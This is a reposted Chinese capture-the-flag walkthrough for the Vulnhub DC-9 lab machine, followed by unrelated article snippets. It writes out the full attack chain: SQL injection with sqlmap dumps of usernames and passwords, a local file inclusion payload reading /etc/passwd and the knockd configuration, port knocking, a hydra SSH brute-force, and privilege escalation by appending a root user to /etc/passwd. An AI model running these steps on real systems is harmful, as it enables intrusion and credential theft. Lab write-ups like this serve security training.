wordpress网站百度数据表格模板网站

pingmian/2025/10/7 14:04:30/文章来源:
wordpress网站百度数据,表格模板网站,c 做注册网站,污网站公司网站目录 一、环境搭建 二、信息收集 1、主机发现 2、指纹识别 三、漏洞复现 1、dirsearch目录探测 2、sqlmap注入测试 3、文件包含漏洞 4、Knockd敲门服务 5、ssh爆破 ​​​​​​​6、提权 四、提取flag 一、环境搭建 Vulnhub靶机下载#xff1a; 官网地址#xff1a;https://… 目录 一、环境搭建 二、信息收集 1、主机发现 2、指纹识别 三、漏洞复现 1、dirsearch目录探测 2、sqlmap注入测试 3、文件包含漏洞 4、Knockd敲门服务 5、ssh爆破 ​​​​​​​6、提权 四、提取flag 一、环境搭建 Vulnhub靶机下载 官网地址https://download.vulnhub.com/dc/DC-9.zip 虚拟机VM虚拟机 或者VBOX 导入即可  网络环境NAT 介绍vulnhub是个提供各种漏洞平台的综合靶场拿到root权限才可以发现最终的flag。 二、信息收集 1、主机发现 nmap -sP 192.168.176.0/24  查看服务 nmap -A -p- -v 192.168.176.145 进入网站192.168.176.145 2、指纹识别  whatweb http://192.168.176.145/  没有发现有用信息 三、漏洞复现 1、dirsearch目录探测 dirsearch -u http://192.168.176.145/ -e php  -x 400,404,503,403                                           http://192.168.176.145/manage.php 后台地址 2、sqlmap注入测试 发现搜索页面存在SQL注入 payload1 or 11 # 现在直接使用sqlmap工具来进行SQL注入攻击 sqlmap -u http://192.168.176.145/results.php -data search1 -dbs sqlmap -u http://192.168.176.145/results.php -data search1 -D users -T UserDetails -C username,password -dump 跑出一些账号密码信息 保存一下  密码如下 | username  | password      | -------------------------- | marym     | 3kfs86sfd     | | julied    | 468sfdfsd2    | | fredf     | 4sfd87sfd1    | | barneyr   | RocksOff      | | tomc      | TCTheBoyz    | | jerrym    | B8m#48sd      | | wilmaf    | Pebbles       | | bettyr    | BamBam01      | | chandlerb | UrAG0D! | | joeyt     | Passw0rd      | | rachelg   | yN72#dsd      | | rossg     | ILoveRachel   | | monicag   | 3248dsds7s    | | phoebeb   | smellycats    | | scoots    | YR3BVxxxw87   | | janitor   | Ilovepeepee   | | janitor2  | Hawaii-Five-0 |再跑另外一个看一下 sqlmap -u http://192.168.176.145/results.php -data search1 -D Staff -T StaffDetails -dump sqlmap -u http://192.168.176.145/results.php -data search1 -D Staff -T Users -C Password,Username -dump 856f5de590ef37314e7c3bdf6f8a66dc | admin  这里跑出一个admin账号密码是md5加密 也可以输入yes sqlmap自带的库碰撞 MD5免费在线解密破解_MD5在线加密-SOMD5  在线解密网站成功拿下 密码transorbital1 3、文件包含漏洞 看了半天只看到这个关键词 存在文件包含漏洞 http://192.168.176.145/manage.php/?file//../../../../etc/passwd 到这里 没思路了 上网看了一下思路 回头看 上面nmap扫描的这个22/tcp filtered ssh # 系统默认开放的但是通过策略关掉了因为被策略保护 处于关闭状态Knockd隐藏SSH 但是这里给出的用户密码信息 应该是可以 爆破一下ssh 4、Knockd敲门服务 4.1.利用LFI看看konckd的配置文件可以fuzz一下/etc 目录一般的配置文件都这个目录里。 payloadfile../../../../../etc/knockd.conf [options] UseSyslog [openSSH] sequence  7469,8475,9842 seq_timeout  25 command  /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags  syn [closeSSH] sequence  9842,8475,7469 seq_timeout  25 command  /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags  syn ​​​​​​​​​​​​​​找到了 特定的端口信息746984759842,按顺序敲敲门 4.2.nmap开启敲门 第一种方法 nmap -p 7469 192.168.176.145 nmap -p 8475 192.168.176.145 nmap -p 9842 192.168.176.145 第二种方法 for x in 7469 8475 9842; do nc 192.168.176.145 $x;done 4.3.现在重新nmap扫描服务看看 直接打开了  nmap -A -p- -v 192.168.176.145 ​​​​​​​5、ssh爆破 5.1.前面sqlmap跑的一个表 整理成字典 5.2.hy爆破 hydra -L username.txt mark -P pass.txt ssh://192.168.176.145    跑出了两个账户 login: joeyt   password: Passw0rd                                                                                                      login: janitor   password: Ilovepeepee ssh joeyt192.168.176.145 -p 22 ssh连接 在janitor用户发现了一个隐藏的文件夹  cd .secrets-for-putin ls -a 存在一些密码写入密码字典继续爆破 之前没有出来的那些账号 5.3.ssh连接fredf login: fredf   password: B4-Tru3-001 ​​​​​​​6、提权 接下来提权  查看有无sudo -l权限  sudo -l 发现fredf可以以root的身份执行 (root) NOPASSWD: /opt/devstuff/dist/test/test 是一个python文件 文件的意思是读取第一个文件追加到第二个文件上 利用find指令找到这个python文件 命令 find / -name test.py 2/dev/null 寻找叫做test.py的文件 接着在/opt/devstuff/发现python源文件test.py 代码如下 import sys if len (sys.argv) ! 3 :print (Usage: python test.py read append)sys.exit (1) else :f  open(sys.argv[1], r)output  (f.read())f  open(sys.argv[2], a)f.write(output)f.close()这是一个可以写入文件的一个python程序,我们可以以root权限写入任意一个文件 所以我们接下来要以root权限在/etc/passwd中写入一个具有root权限的用户 因为在/etc/passwd中的密码都是加密过的我们也要设计一个加密的密码 设置密码命令 openssl passwd -1(md5加密算法) -salt用一个随机数去加盐 admin 123456 openssl passwd -1 -salt admin 123456  生成密码$1$admin$LClYcRe.ee8dQwgrFc5nz. 先把这些写入临时文件再用test.py读取文件追加到passwd里面 1、写入临时文件 echo admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0:/root:/bin/bash /tmp/mm 2、python程序追加到etc/passwd sudo ./test /tmp/mm.txt  /etc/passwd 3、切换用户看看 su admin 4、交互式shell python -c import pty;pty.spawn(/bin/bash) 四、提取flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/89395.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

环县网站怎么做湘潭专业sem优化

Css 处理 提取 Css 成单独文件 Css 文件目前被打包到 js 文件中,当 js 文件加载时,会创建一个 style 标签来生成样式 这样对于网站来说,会出现闪屏现象,用户体验不好 我们应该是单独的 Css 文件,通过 link 标签加载…

柳城网站天津平台网站建设制作

来源:混沌巡洋舰圣塔菲研究院4月就智能的本质(不管其是人类的,还是机器的)举行的研讨会,旨在通过跨学科的整合来促进人工智能的发展。研讨会期间,来自不同学科的大牛聚集在一起,讨论如何将智力分…

邵阳建设网站哪家好网站建设长春

nvm-sh/nvm Stars: 67.6k License: MIT Node Version Manager,是一个 POSIX 兼容的 bash 脚本,用于管理多个活动 node.js 版本。nvm 可以让你通过命令行快速安装和使用不同版本的 Node。它可以在任何符合 POSIX 标准的 shell(sh、dash、ksh…

天津塘沽网站建设公司电子贺卡制作软件app

深圳女作家、画家崔文僮的散文绘画集出版。该书是她观察生活、体验人生、感悟艺术的真实记录。著名女作家徐小斌看了她的文章和绘画,写道:“‘生活家’这个概念令人非常感兴趣。文僮决定做一个‘有追求’的‘生活家’,这本身就十分有趣&#…

暴雪战网官方网站入口小程序头条小游戏

1 卷积介绍 1.1 什么是卷积 卷积(convolution),是一种运算,你可以类比于加,减,乘,除,矩阵的点乘与叉乘等等,它有自己的运算规则,卷积的符号是星号*。表达式…

做一个响应式网站价格网站备案 修改

目录 三、FP-增长算法(一)算法的背景(二)构造FP-树(三)生成频繁项集 四、关联规则的评价(一)支持度和置信度的不足(二)相关性分析 三、FP-增长算法 &#xf…

网站开发报价单 excel网站功能策划书

Python搭建简单的web服务器 1.winR输入cmd打开命令行 2.通过 cd 进入到你保存 HTML 文件的目录。例如:H:\D3\d3 输入 cd\ 指令进入到C盘的根目录。(CD(更改目录)。使用此命令可以更改当前目录) 这里解释一下cd指令基本…

科院公司网站建设目标是什么上海虹口网站建设

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、pandas是什么?二、使用步骤 1.引入库2.读入数据总结 前言 根据AS自治系统可以将动态路由协议划分为IGP和EGP协议。IGP协议是应用在AS内部&#…

网站建设先进个人事迹崔凯 本地wordpress

Redis持久化机制的三种方式:RDB、AOF和混合持久化 Redis是一种高性能的内存数据结构存储系统,它提供了丰富的数据结构和操作,如键值对、列表、集合、哈希表等。然而,由于Redis是内存存储,一旦服务器停止运行&#xff…

单位的网站建设费如何核算延边省建设局网站官网

vim 快速跳到文件末尾 在最后一行下方新增一行 移到末尾,并且进入文本录入模式 GA (大写G大写A) 在一般模式(刚进入的模式,esc模式) GA 或 Shift ga 先 G 或 shiftg 到最后一行 然后 A 或 shifta 到本行末尾 并且进入文本录入模式 在最后一行下方新增一行 (光标换行,文字不…

劳务派遣做网站的好处asp 网站运行

不再多言 玩者自知しょぼんのアクション猫版超级玛丽 下载

手机怎么创网站免费惠阳区城市建设规划局网站

文 | 琴梨梨源 | 知乎今天无聊刷GitHub看到一个让我血压上来的项目乍一看,2.4k star,应该不像是什么小项目应该是比较有用的项目,但接下来的事情属实是让我气的很对于开源项目我是不喜欢下载预构建的成品的,我更喜欢自己动手从源代…

佛山网站建设佛山网络推广保定网站建设找谁

如何使用 dotnet pack 打包 .NET 跨平台程序集? dotnet pack 介绍官方描述 dotnet pack 命令说明使用示例打包 .net 类库项目生成带注释的 nuget 包构建特定平台的 nuget 包关于 .NET RID 目录 dotnet pack 介绍 dotnet pack 是一个 .NET Core NuGet 包打包程序。 …

制作网站制作公司甘肃省建设厅查行网站

目录 1 学习路线图2 应用介绍3 编辑器介绍总结 低代码的概念于2014年由 Forrester 首次正式提出。其将低代码定义为:能够以“最少的手写代码”和设置快速开发应用、配置和部署业务应用程序。 不同应用厂商的解法不一样,Gartner评估了400多款低代码/无代码…

wordpress建站怎么上传公司企业宣传片的拍摄

6 分布式系统 Redis 分布式系统,官方称为 Redis Cluster,Redis 集群,其是 Redis 3.0 开始推出的分布式解决方案。其可以很好地解决不同 Redis 节点存放不同数据,并将用户请求方便地路由到不同 Redis 的问题。 什么是分布式系统?…

如何在网站做电子报深圳福田香格里拉酒店

火狐浏览器是我们大家经常使用的浏览器之一,在使用这款浏览器的过程有时候需要使用到摄像头,那你知道火狐浏览器摄像头权限怎么开启的吗?接下来我们一起往下看看火狐浏览器摄像头权限开启的方法吧。 方法步骤 1、打开火狐浏览器,点击右上角…

建设一个网站最低消费微信开放平台创建小程序

Part11-Join Algorithms Why Do We Need to Join? Join其实是关系数据库和范式化表时候所产生的副产物。 也就是说我们范式化表是为了减少冗余信息,而我们使用join就是为了去重建reconstruct 这些原本的tuple Join Algorithms 主要关注两表的inner equijoin a…

金坛做网站桂林象鼻山景区简介

森林防火手抄报模板参考【文字素材参考】01森林防火根据森林火灾燃烧中央地点,蔓延速度,受害部位和程度,大致可把森林火灾分为三大类:一.地表火 二.树冠火 三.地下火。以受害森林面积大小为标准,森林火灾分为以下四类:1.森林火警:…

在工行网站上如何做现金理财做网站看什么书好

背景介绍 在ADO.NET中我们可以根据用户输入的查询条件拼接出指定的SQL语句进行查询或者筛选出所需的数据,但是在ORM框架如EF中,我们一般用LINQ操作数据查询,LINQ是否可以像SQL一样拼接查询条件呢?答案是可以的。这一技术叫Linq.D…

沈阳企业网站怎样制作妇科医生免费咨询

c中的对象的构造顺序与析构顺序 问题一 当程序中存在多个对象时,如何确定这些对象的析构顺序? 一.单个函数创建时构造函数的调用顺序 1.调用父类的构造过程 2.调用成员变量的构造函数(调用顺序与声明顺序相同) 3.调用类自身的构造函数 而析构函数与…